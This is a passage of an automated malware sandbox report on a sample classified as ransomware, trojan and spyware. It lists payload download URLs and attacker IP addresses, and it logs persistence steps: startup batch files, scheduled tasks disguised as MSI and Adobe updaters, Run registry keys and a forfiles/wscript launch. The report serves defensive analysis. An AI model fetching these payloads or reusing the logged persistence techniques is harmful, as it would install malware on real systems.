                                                                                                                                                                                      https://monoblocked.com/525403/setup.exes.#9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1454114356.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485462188.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1458630982.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://triedchicken.net/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://google.comVtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                                                                                                                                                              https://carthewasher.net/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://monoblocked.com/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://vk.com/doc5294803_668907894?hash=eTJ5SXFgNlVQn3fSuayzbK2uQj2QDtrGinGQ1gFeZF8&dl=85Q0IzWrQzIU9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://c.574859385.xyz/MV9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://monoblocked.com/525403/setup.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://devlog.gregarius.net/docs/ua)LinksPA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                                                          https://dod.fastbutters.com/style/060.exe3/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1454114356.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485462188.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1458630982.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://monoblocked.com/IV9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://aka.ms/dotnet-warnings/file.exe, 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000000.1314917888.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                http://crl.thawte.com/ThawteTimestampingCA.crl0Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://cheremushki.net/ba05c0a0a72880db02f3b2bf7866285a/7725eaa6592c80f8124e769b4e8a07f7.exeWebKit/9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://5.42.66.10/download/th/retail.php.9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://dod.fastbutters.com:80/style/060.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://5.42.66.10/download/th/getimage12.php9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://5.42.66.10/download/123p.exe9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://sectigo.com/CPS0DVtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                185.172.128.90
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                34.117.186.192
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                85.192.56.26
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		12695DINET-ASRUfalse
                                                                                                                                                                                                                                37.221.125.202
                                                                                                                                                                                                                                		unknownLithuania
                                                                                                                                                                                                                                		62416PTSERVIDORPTfalse
                                                                                                                                                                                                                                193.233.132.175
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                185.172.128.76
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                                176.97.76.106
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                                                                193.233.132.253
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                104.21.86.198
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                87.240.137.164
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                                                                                                                                                                                                                                193.233.132.234
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                37.228.108.132
                                                                                                                                                                                                                                		unknownNorway
                                                                                                                                                                                                                                		39832NO-OPERANOfalse
                                                                                                                                                                                                                                185.172.128.59
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                172.67.161.113
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                176.113.115.135
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		49505SELECTELRUfalse
                                                                                                                                                                                                                                104.21.49.118
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                95.142.206.3
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                                                                                                                                                                                                                                104.21.79.77
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                95.142.206.0
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                                                                                                                                                                                                                                104.21.31.124
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.63.150
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.90.14
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.169.89
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.188.178
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.20.3.235
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                185.172.128.228
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                172.67.176.131
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                186.145.236.18
                                                                                                                                                                                                                                		unknownColombia
                                                                                                                                                                                                                                		14080TelmexColombiaSACOfalse
                                                                                                                                                                                                                                185.172.128.203
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                                172.67.144.181
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.75.166
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.55.189
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.26.8.59
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.180.119
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                5.42.66.10
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                                                                                                                                                                                                                                172.67.193.79
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.20.4.235
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                172.67.19.24
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                107.167.110.218
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                107.167.110.216
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                104.18.11.89
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                104.21.4.208
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                107.167.110.211
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		21837OPERASOFTWAREUSfalse
                                                                                                                                                                                                                                45.130.41.108
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		198610BEGET-ASRUfalse
                                                                                                                                                                                                                                107.167.125.189
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		21837OPERASOFTWAREUSfalse

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                Analysis ID:1430552
                                                                                                                                                                                                                                Start date and time:2024-04-23 21:36:08 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 15m 0s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:51
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@208/425@0/45
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 84%
                                                                                                                                                                                                                                • Number of executed functions: 108
                                                                                                                                                                                                                                • Number of non-executed functions: 274
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                21:37:08API Interceptor749x Sleep call for process: AddInProcess32.exe modified
                                                                                                                                                                                                                                21:37:14API Interceptor15x Sleep call for process: 9wqoiPpK0NIQEBygxfm6h42G.exe modified
                                                                                                                                                                                                                                21:37:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat
                                                                                                                                                                                                                                21:37:20API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                21:37:24API Interceptor334x Sleep call for process: u69w.0.exe modified
                                                                                                                                                                                                                                21:37:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.bat
                                                                                                                                                                                                                                21:37:30Task SchedulerRun new task: bWycNackLSywaqkmgR path: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe s>em /VNsite_idnLd 385118 /S
                                                                                                                                                                                                                                21:37:30API Interceptor382x Sleep call for process: u4dc.0.exe modified
                                                                                                                                                                                                                                21:37:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.bat
                                                                                                                                                                                                                                21:38:03API Interceptor3x Sleep call for process: 0FR80IiNvxJZyXnpOgiDlYNV.exe modified
                                                                                                                                                                                                                                21:38:16API Interceptor3x Sleep call for process: zUOgRazdYnb35XHU4UIsV9Yc.exe modified
                                                                                                                                                                                                                                21:38:17API Interceptor3x Sleep call for process: PA8JWMmRYiQsN7iqTjOvjsbW.exe modified
                                                                                                                                                                                                                                21:38:17API Interceptor3x Sleep call for process: OYqxk9G3x4R05N4I0KLZXbXg.exe modified
                                                                                                                                                                                                                                21:38:18API Interceptor3x Sleep call for process: 68bEfZA6FBu6lC5BaADYSIdx.exe modified
                                                                                                                                                                                                                                21:38:23Task SchedulerRun new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
                                                                                                                                                                                                                                21:38:23Task SchedulerRun new task: MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG path: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
                                                                                                                                                                                                                                21:38:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.bat
                                                                                                                                                                                                                                21:39:00API Interceptor1x Sleep call for process: koEMGMU.exe modified
                                                                                                                                                                                                                                21:39:05Task SchedulerRun new task: BAnwxolbGpCzXNxkj path: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exe s>XT /VCsite_idxGE 385118 /S
                                                                                                                                                                                                                                21:39:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
                                                                                                                                                                                                                                21:39:22Task SchedulerRun new task: MrNSpwukvDtlP2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\wGkeBUkfAIhWvVVB\nWLJJTZ.wsf^""
                                                                                                                                                                                                                                21:39:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
                                                                                                                                                                                                                                21:39:37Task SchedulerRun new task: Opera scheduled Autoupdate 1713901169 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --bypasslauncher $(Arg0)

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

